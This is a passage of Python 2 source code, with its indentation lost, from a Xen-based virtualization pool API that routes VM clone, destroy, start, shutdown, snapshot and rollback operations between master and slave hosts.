@see VM_clone
'''
log.debug('in VM_clone with MAC...')
storage = self._get_BNStorageAPI_instance()
if not vdi_uuid_map:
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value', '')
if not newuuid:
newuuid = genuuid.gen_regularUuid()
check_uuid = self._VM_create_check_vm_uuid_unique(newuuid)
if not check_uuid:
return xen_api_error(XEND_API_ERROR_VM_UNIQUE_UUID_ERROR)
vdi_uuid_map = {}
vdis = vdis_resp.get('Value', [])
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
if sys_vdi in vdis:
vdi_uuid_map[sys_vdi] = newuuid
if BNPoolAPI._isMaster:
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
#mapping parent vdi's uuid to new one.
h_ip = BNPoolAPI.get_host_ip(h_ref)
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return xen_rpc_call(h_ip, 'VM_clone_local_MAC', vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
log.debug("VM_clone, vdi map:")
log.debug(vdi_uuid_map)
# log.debug("update pool data structs before clone!!!")
# BNPoolAPI.update_data_struct("vm_clone", newuuid, h_ref)
if cmp(h_ref, XendNode.instance().uuid) == 0:
log.debug("clone from master")
response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
# domuuid = response.get('Value')
# if domuuid:
# BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
else:
log.debug("clone from slave")
response = xen_rpc_call(h_ip, 'VM_clone_MAC', vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
# domuuid = response.get('Value')
# log.debug('New domain uuid: %s' % domuuid)
# if domuuid:
# BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
if cmp(response.get('Status'), 'Success') == 0:
domuuid = response.get('Value')
if not domuuid:
log.exception('WARNING: VM_clone_MAC, domuuid not returned!!!')
domuuid = newuuid
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
else:
BNPoolAPI.update_data_struct("vm_clone", domuuid, h_ref)
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
return response
else:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
response = self.VM_clone_local_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
else:
log.debug('in VM_clone MAC')
log.debug("VM_clone, vdi map:")
log.debug(vdi_uuid_map)
response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
domuuid = response.get('Value')
if not vdi_exists:
storage.VDI_clone(session, vdi_uuid_map, newname, domuuid)
return response
def VM_clone_local_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map=None, newuuid=None):
'''
@deprecated: not used
'''
log.debug('VM_clone_local_MAC >>>>>')
storage = self._get_BNStorageAPI_instance()
vdis_resp = storage.VDI_get_by_vm(session, vm_ref)
if not vdi_uuid_map:
vdi_uuid_map = {}
vdis = vdis_resp.get('Value')
if vdis:
for vdi in vdis:
vdi_uuid_map[vdi] = genuuid.gen_regularUuid()
log.debug(vdi_uuid_map)
response = self._VM_clone_MAC(session, vm_ref, newname, mac_addr, vdi_uuid_map, newuuid = newuuid)
domuuid = response.get('Value')
if domuuid:
BNPoolAPI.update_data_struct("vm_clone", domuuid, XendNode.instance().uuid)
response = storage._VDI_clone(session, vdi_uuid_map, newname, vm_ref)
vdi_uuid = response.get('Value')
if vdi_uuid:
#BNPoolAPI.update_VDI_create(host_ref, sr_ref)
BNPoolAPI.update_data_struct("vdi_create", XendNode.instance().uuid, vdi_uuid)
return xen_api_success(domuuid)
def _VM_clone_MAC(self, session, vm_ref, newname, mac_addr, vdi_uuid_map=None, newuuid=None):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_clone_MAC
'''
log.debug('in _VM_clone_MAC')
xendom = XendDomain.instance()
domuuid = xendom.domain_clone_MAC(vm_ref, newname, mac_addr, vdi_uuid_map, newuuid)
# domuuid = XendTask.log_progress(0, 100, xendom.domain_clone_MAC, vm_ref, newname, mac_addr,\
# vdi_uuid_map, newuuid)
return xen_api_success(domuuid)
def VM_clone_system_VDI(self, session, vm_ref, newuuid):
'''
@author: wuyuewen
@summary: Clone VM system VDI
@param session: session of RPC.
@param vm_ref: VM's uuid
@param newuuid: new VDI uuid
@return: True | False
@rtype: dict.
@raise xen_api_error:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_clone_system_VDI(session, vm_ref, newuuid)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_clone_system_VDI', vm_ref, newuuid)
else:
return self._VM_clone_system_VDI(session, vm_ref, newuuid)
def _VM_clone_system_VDI(self, session, vm_ref, newuuid):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_clone_system_VDI
'''
try:
storage = self._get_BNStorageAPI_instance()
sys_vdi = self.VM_get_system_VDI(session, vm_ref).get('Value')
if sys_vdi:
vdi_uuid_map = { sys_vdi : newuuid }
new_vdi = storage.VDI_clone(session, vdi_uuid_map, newuuid, newuuid).get('Value')
if new_vdi:
return xen_api_success(new_vdi)
else:
return xen_api_error(['VM_clone_system_VDI', ' Failed'])
else:
return xen_api_error(['VM_clone_system_VDI', ' orig VDI not found!'])
except Exception, exn:
log.debug(exn)
storage.VDI_destroy(session, newuuid)
return xen_api_error(['VM_clone_system_VDI', ' Exception'])
def VM_destroy(self, session, vm_ref, del_vdi=False, del_ha_sxp=True, update_pool_structs=True):
'''
@author: wuyuewen
@summary: Destroy the specified VM. The VM is completely removed from the system.
This function can only be called when the VM is in the Halted State.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param del_vdi: True | False, destroy VM's VDIs as well
@param del_ha_sxp: True | False, destroy sxp file in HA dir.
@param update_pool_structs: True | False, update_pool_structs in Xend memory structure.
@return: True | False
@rtype: dict.
@raise xen_api_error:
'''
storage = self._get_BNStorageAPI_instance()
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
log.debug("destroy local vm: %s" % vm_ref)
return xen_rpc_call(host_ip, 'VM_destroy_local', vm_ref, True)
if cmp(host_ref, XendNode.instance().uuid) == 0:
vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
response = self._VM_destroy(session, vm_ref, del_ha_sxp, update_pool_structs)
else:
vdis = xen_rpc_call(host_ip, 'VDI_get_by_vm', vm_ref).get('Value')
response = xen_rpc_call(host_ip, 'VM_destroy', vm_ref, del_vdi, del_ha_sxp, update_pool_structs)
if update_pool_structs:
BNPoolAPI.update_data_struct("vm_destroy", vm_ref)
if del_vdi and vdis:
## host_ip = BNPoolAPI.get_host_ip(XendNode.instance().uuid)
for vdi in vdis:
log.debug('destroy vdi: %s' % vdi)
storage.VDI_destroy(session, vdi)
# xen_rpc_call(host_ip, 'VDI_destroy', vdi, True)
return response
else:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
response = self.VM_destroy_local(session, vm_ref, del_vdi)
else:
vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
response = self._VM_destroy(session, vm_ref, del_ha_sxp, update_pool_structs)
if del_vdi and vdis:
# host_ip = BNPoolAPI.get_host_ip(XendNode.instance().uuid)
for vdi in vdis:
log.debug('destroy vdi: %s' % vdi)
storage.VDI_destroy(session, vdi)
return response
def VM_destroy_local(self, session, vm_ref, del_vdi=False):
'''
@deprecated: not used
'''
storage = self._get_BNStorageAPI_instance()
vdis = storage._VDI_get_by_vm(session, vm_ref).get('Value')
response = self._VM_destroy(session, vm_ref, False)
BNPoolAPI.update_data_struct("vm_destroy", vm_ref)
if del_vdi and vdis:
for vdi in vdis:
storage._VDI_destroy(session, vdi)
return response
def _VM_destroy(self, session, vm_ref, del_ha_sxp=False, update_pool_structs=True):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_destroy
'''
self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# vifs = dom.get_vifs()
# if vifs:
# for vif in dom.get_vifs():
# self._VM_del_ip_map(session, vm_ref, vif)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_delete", vm_ref, del_ha_sxp, update_pool_structs)
def VM_get_lost_vm_by_label(self, session, label, exactMatch):
'''
@author: wuyuewen
@summary: In some uncommon conditions a VM is destroyed by Xend while its disks (VDIs) still exist.
This method finds such VMs via the sxp files stored for HA.
@param session: session of RPC.
@param label: label(uuid or name) of VM
@param exactMatch: full match the given label
@return: list of VMs
@rtype: dict.
'''
if BNPoolAPI._isMaster:
all_vms = {}
all_vms = self._VM_get_lost_vm_by_label(session, label, exactMatch).get('Value')
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
response = xen_rpc_call(remote_ip, 'VM_get_lost_vm_by_label', label, exactMatch)
remote_vms = response.get('Value')
if remote_vms:
all_vms.update(remote_vms)
# log.debug(all_vms)
return xen_api_success(all_vms)
else:
return self._VM_get_lost_vm_by_label(session, label, exactMatch)
def _VM_get_lost_vm_by_label(self, session, label, exactMatch):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_get_lost_vm_by_label
'''
xendom = XendDomain.instance()
return xen_api_success(xendom.find_lost_vm_by_label(label, exactMatch))
def VM_get_lost_vm_by_date(self, session, date1, date2):
'''
@author: wuyuewen
@summary: In some uncommon conditions a VM is destroyed by Xend while its disks (VDIs) still exist.
This method finds such VMs via the sxp files stored for HA.
@param session: session of RPC.
@param date1: date of start
@param date2: date of end
@return: list of VMs
@rtype: dict.
'''
if BNPoolAPI._isMaster:
all_vms = {}
now_vms = []
all_vms = self._VM_get_lost_vm_by_date(session, date1, date2).get('Value')
for k in BNPoolAPI.get_hosts():
if cmp(k, XendNode.instance().uuid) == 0:
continue
remote_ip = BNPoolAPI.get_host_ip(k)
response = xen_rpc_call(remote_ip, 'VM_get_lost_vm_by_date', date1, date2)
remote_vms = response.get('Value')
if remote_vms:
all_vms.update(remote_vms)
now_vms_resp = self.VM_get_all(session)
if cmp(now_vms_resp['Status'], 'Success') == 0:
now_vms = now_vms_resp.get("Value")
if now_vms:
for i in all_vms.keys():
vm_uuid_s = re.search(r"/(\S+)/", i)    # extract vm uuid from path (currently unused)
if i in now_vms:
del all_vms[i]
continue
# log.debug(all_vms)
return xen_api_success(all_vms)
else:
return self._VM_get_lost_vm_by_date(session, date1, date2)
def _VM_get_lost_vm_by_date(self, session, date1, date2):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_get_lost_vm_by_date
'''
xendom = XendDomain.instance()
return xen_api_success(xendom.find_lost_vm_by_date(date1, date2))
def VM_hard_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Stop executing the specified VM without attempting a clean shutdown and immediately restart the VM.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise VMBadState:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_hard_reboot(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_hard_reboot', vm_ref)
else:
return self._VM_hard_reboot(session, vm_ref)
def _VM_hard_reboot(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_hard_reboot
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_reset", vm_ref)
def VM_hard_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Stop executing the specified VM without attempting a clean shutdown.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
@raise VMBadState:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_hard_shutdown(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_hard_shutdown', vm_ref)
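# NOTE: the wait loop below is unreachable; both branches above have
# already returned.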
i = 0
time_out = 120
while True:
i += 1
# ps_new = self.VM_get_power_state(session, vm_ref)['Value']
domid = self.VM_get_domid(session, vm_ref)['Value']
# log.debug(ps_new)
if not domid or cmp (int(domid), -1) == 0:
break
elif cmp(i, time_out) > 0:
break
else:
time.sleep(0.5)
continue
else:
return self._VM_hard_shutdown(session, vm_ref)
def _VM_hard_shutdown(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_hard_shutdown
'''
#self._VM_clean_IO_limit_shutdown(session, vm_ref)
return XendTask.log_progress(0, 100, do_vm_func,
"domain_destroy", vm_ref)
def VM_pause(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_pause(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_pause', vm_ref)
else:
return self._VM_pause(session, vm_ref)
def _VM_pause(self, session, vm_ref):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_pause", vm_ref)
# do snapshot for system vdi of vm
def VM_snapshot(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Take a snapshot of VM's system VDI. The sragent runs on the Host and listens on port 10010.
@precondition: sragent is running on the host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_snapshot_vdi(session, vdi_ref, name)
# snapshot for vdi of vm
def _VM_snapshot_vdi(self, session, vdi_ref, name):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_snapshot
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.exception('VM_snapshot_vdi>>>>>vdi does not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record(session, sr).get('Value')
if not sr_rec:
log.exception('Get SR record failed!')
return xen_api_success(False)
# log.debug("sr rec : %s" % sr_rec)
sr_type = sr_rec.get('type')
result = False
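# The snapshot is delegated to an sragent XML-RPC service on port 10010:
# for cluster filesystems (gpfs/mfs/ocfs2) the local agent is called with
# the SR mount point, otherwise the agent on the SR's storage server
# (taken from other_config['location']) is used.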
if cmp(sr_type, 'gpfs') == 0:
log.debug('gpfs snapshot>>>>>')
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_gpfs(mount_point, vdi_ref, name)
elif cmp(sr_type, 'mfs') == 0:
log.debug('mfs snapshot>>>>>>')
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_mfs(mount_point, vdi_ref, name)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_ocfs2(mount_point, vdi_ref, name)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.snapshot_ocfs2(mount_point, vdi_ref, name)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.snapshot(sr, vdi_ref, name)
log.debug("snapshot result : %s " % result)
return xen_api_success(result)
def VM_rollback(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Roll back a snapshot of VM's system VDI. The sragent must be running on the Host, listening on port 10010.
@precondition: sragent is running on the host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_rollback_vdi(session, vdi_ref, name)
def _VM_rollback_vdi(self, session, vdi_ref, name):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_rollback
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_rollback_vdi>>>>>vdi does not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record does not exist>>>>')
return xen_api_success(False)
# log.debug("sr rec : %s" % sr_rec)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
log.debug('rollback gpfs>>>>>')
p_location = vdi_rec['location'].split(':')[1]
index = p_location.rfind('/')
if index != -1:
file_name = p_location[index+1:]
new_location = p_location[:index+1] + name + p_location[index+1:]
snap_location = '%s/%s/.snapshots/%s/%s' %(sr_rec['location'], vdi_ref, \
name, file_name)
log.debug('=====>VM rollback :snap location %s=====' % snap_location)
log.debug('new_location: %s' % new_location)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_gpfs(snap_location, new_location, p_location)
elif cmp(sr_type, 'mfs') == 0:
log.debug('mfs rollback>>>>>>')
mfs_name = sr_rec['mfs_name']
log.debug('mfs_name: %s' % mfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_mfs(mfs_name, vdi_ref, name)
elif cmp(sr_type, 'ocfs2') == 0:
log.debug('ocfs2 rollback>>>>>>')
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_ocfs2(mount_point, vdi_ref, name)
elif cmp(sr_type, 'local_ocfs2') == 0:
log.debug('local ocfs2 rollback>>>>>>')
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.rollback_ocfs2(mount_point, vdi_ref, name)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.rollback(sr, vdi_ref, name)
log.debug("rollback result : %s " % result)
return xen_api_success(result)
def VM_destroy_snapshot(self, session, vm_ref, name):
'''
@author: wuyuewen
@summary: Destroy a snapshot of VM's system VDI. The sragent must be running on the Host, listening on port 10010.
@precondition: sragent is running on the host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param name: snapshot's name
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_destroy_vdi_snapshot(session, vdi_ref, name)
def VM_destroy_all_snapshots(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Destroy all snapshots of VM's system VDI. The sragent must be running on the Host, listening on port 10010.
@precondition: sragent is running on the host.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
# log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_destroy_all_vdi_snapshots(session, vdi_ref)
def _VM_destroy_all_vdi_snapshots(self, session, vdi_ref, sr = None):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_destroy_all_snapshots
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = {}    # keep defined even when sr is passed in; used below for 'inUse'
if not sr:
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_destroy_all_vdi_snapshots>>>>>vdi does not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record does not exist>>>>')
return xen_api_success(False)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
gpfs_name = sr_rec['gpfs_name']
log.debug('gpfs_name: %s' % gpfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.destroy_all_gpfs(gpfs_name, vdi_ref)
elif cmp(sr_type, 'mfs') == 0:
mfs_name = sr_rec['mfs_name']
log.debug('mfs_name: %s' % mfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_mfs(mfs_name, vdi_ref)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_ocfs2(mount_point, vdi_ref)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_all_ocfs2(mount_point, vdi_ref)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.destroy_all(sr, vdi_ref)
log.debug("destroy_snapshot result : %s " % result)
if result: # destroy succeeded
inUse = vdi_rec.get('inUse', True)
log.debug('vdi in use>>>>>>>>>>>>>>%s' % inUse)
if not inUse:
storage.VDI_destroy_final(session, vdi_ref, True, True)
return xen_api_success(result)
def _VM_destroy_vdi_snapshot(self, session, vdi_ref, name):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_destroy_snapshot
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_destroy_vdi_snapshot>>>>>vdi does not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record does not exist>>>>')
return xen_api_success(False)
sr_type = sr_rec.get('type')
result = False
if cmp(sr_type, 'gpfs') == 0:
gpfs_name = sr_rec['gpfs_name']
log.debug('gpfs_name: %s' % gpfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
result = proxy.destroy_gpfs(gpfs_name, vdi_ref, name)
elif cmp(sr_type, 'mfs') == 0:
mfs_name = sr_rec['mfs_name']
log.debug('mfs_name: %s' % mfs_name)
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
log.debug(name)
result = proxy.destroy_mfs(mfs_name, vdi_ref, name)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_ocfs2(mount_point, vdi_ref, name)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
proxy = ServerProxy("http://127.0.0.1:10010")
log.debug(vdi_ref)
result = proxy.destroy_ocfs2(mount_point, vdi_ref, name)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
result = proxy.destroy(sr, vdi_ref, name)
log.debug("destroy_snapshot result : %s " % result)
# if there are no snapshots and the vdi is no longer associated with a vm
inUse = vdi_rec.get('inUse', True)
log.debug('vdi in use>>>>>>>>>>>>>>%s' % inUse)
if not inUse:
snap_num = len(self._VM_get_vdi_snapshots(session, vdi_ref).get('Value'))
if snap_num == 0:
storage.VDI_destroy_final(session, vdi_ref, True, True)
return xen_api_success(result)
def VM_resume(self, session, vm_ref, start_paused):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_resume(session, vm_ref, start_paused)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_resume', vm_ref, start_paused)
else:
return self._VM_resume(session, vm_ref, start_paused)
def _VM_resume(self, session, vm_ref, start_paused):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_resume", vm_ref,
start_paused = start_paused)
def VM_start(self, session, vm_ref, start_paused, force_start):
'''
@author: wuyuewen
@summary: Start the specified VM. This function can only be called with the VM is in the Halted State.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param: start_paused
Instantiate VM in paused state if set to true.
@param: force_start
Attempt to force the VM to start. If this flag is false then
the VM may fail pre-boot safety checks (e.g. if the CPU the VM
last booted on looks substantially different to the current
one)
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_start(session, vm_ref, start_paused, force_start)
else:
return xen_rpc_call(host_ip, 'VM_start', vm_ref, start_paused, force_start)
else:
return self._VM_start(session, vm_ref, start_paused, force_start)
def _VM_start(self, session, vm_ref, start_paused, force_start):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_start
'''
if not self._VM_can_start(session, vm_ref):
return xen_api_error(['MEMORY_NOT_ENOUGH', 'VM', vm_ref])
crush_vm = self._VM_check_fibers_valid(session, vm_ref).get('Value')
if crush_vm:
return xen_api_error(['FIBER_IN_USE:', crush_vm])
crush_vm = self._VM_check_usb_scsi_valid(session, vm_ref).get('Value')
if crush_vm:
return xen_api_error(['USB_IN_USE:', crush_vm])
try:
log.debug("VM starting now....")
response = XendTask.log_progress(0, 100, do_vm_func,
"domain_start", vm_ref,
start_paused=start_paused,
force_start=force_start)
log.debug(response)
return response
except HVMRequired, exn:
log.error(exn)
return xen_api_error(['VM_HVM_REQUIRED', vm_ref])
#add by wufan
def VM_can_start(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Check whether the specified VM can start, based on the host's free memory.
@param session: session of RPC.
@param vm_ref: VM's uuid
@return: True | False
@rtype: dict
@raise xen_api_error:
'''
return xen_api_success(self._VM_can_start(session, vm_ref))
def _VM_can_start(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_can_start
'''
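# A sketch of the check below: the VM may start only if
#   host_free_memory - vm_memory_dynamic_max > RESERVED_MEM
# where host_free_memory = total_memory - sum(memory_dynamic_max of all
# running domains except Domain-0).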
host_mem_free = self._host_metrics_get_memory_free()
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
if not dominfo:
log.debug("can not find vm:" + vm_ref)
return xen_api_error(['VM_NOT_FOUND', 'VM', vm_ref])
if self._VM_get_is_a_template(session, vm_ref).get('Value'):
return xen_api_error(XEND_API_ERROR_VM_IS_TEMPLATE)
dom_mem = dominfo.get_memory_dynamic_max()
free_memory = int(host_mem_free) - int(dom_mem)
log.debug("can start: %s, memory left limit: %sG" % (str(cmp(free_memory, RESERVED_MEM) > 0), str(RESERVED_MEM/1024/1024/1024)))
log.debug("free memory: %sG" % str(free_memory/1024/1024/1024))
# by henry, dom0 memory should greate than 4G
if cmp(free_memory, RESERVED_MEM) > 0:
return True
else:
return False
def _host_metrics_get_memory_free(self):
'''
@author: wuyuewen
@summary: Internal method.
@see: host_metrics_get_memory_free
'''
node = XendNode.instance()
xendom = XendDomain.instance()
doms = xendom.list()
doms_mem_total = 0
for dom in doms:
if cmp(dom.get_uuid(), DOM0_UUID) == 0:
continue
dominfo = xendom.get_vm_by_uuid(dom.get_uuid())
doms_mem_total += dominfo.get_memory_dynamic_max()
# log.debug("doms memory total: " + str(doms_mem_total))
# log.debug("host memory total:" + str(node.xc.physinfo()['total_memory'] * 1024))
return node.xc.physinfo()['total_memory'] * 1024 - doms_mem_total
'''
check whether the vif is created and up
'''
def _VM_check_vif_up(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
'''
log.debug('check if vif up >>>>>>>>>>')
# get vm domid
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
domid = dominfo.getDomid()
vif_num = len(dominfo.get_vifs()) # get num of vifs
log.debug('vm(%s) domid(%s) has %s vifs' % (vm_ref, domid, vif_num))
for eth_num in range(vif_num):
vif_dev = 'vif%s.%s' % (domid, eth_num)
vif_emu_dev = 'vif%s.%s-emu' % (domid, eth_num)
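# NOTE: the actual state check of vif_dev/vif_emu_dev (e.g. via xenstore
# or sysfs) was never implemented; the device names are computed but not
# used, so this method currently has no effect.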
# def _VM_check_fiber(self, session, vm_ref):
# if self._VM_check_fibers_valid(session, vm_ref).get('Value'):
# return True
# else :
# log.debug('fiber device in use')
# return False
def VM_start_on(self, session, vm_ref, host_ref, start_paused, force_start):
'''
@author: wuyuewen
@summary: Start the specified VM on specified Host. This function can only be called with the VM is in the Halted State.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param host_ref: Host's uuid
@param: start_paused
Instantiate VM in paused state if set to true.
@param: force_start
Attempt to force the VM to start. If this flag is false then
the VM may fail pre-boot safety checks (e.g. if the CPU the VM
last booted on looks substantially different to the current
one)
@return: True | False
@rtype: dict.
'''
# import threading
# lock = threading.Lock()
# lock.acquire()
#self.__init_lock__.acquire()
try:
